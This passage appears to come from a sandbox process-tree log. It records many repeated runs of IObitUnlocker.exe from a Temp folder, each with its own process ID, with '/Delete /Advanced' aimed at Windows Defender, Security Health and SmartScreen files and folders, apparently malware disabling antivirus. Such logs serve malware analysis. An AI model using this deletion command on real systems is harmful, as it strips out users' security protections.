Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:10104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:9196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:9988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 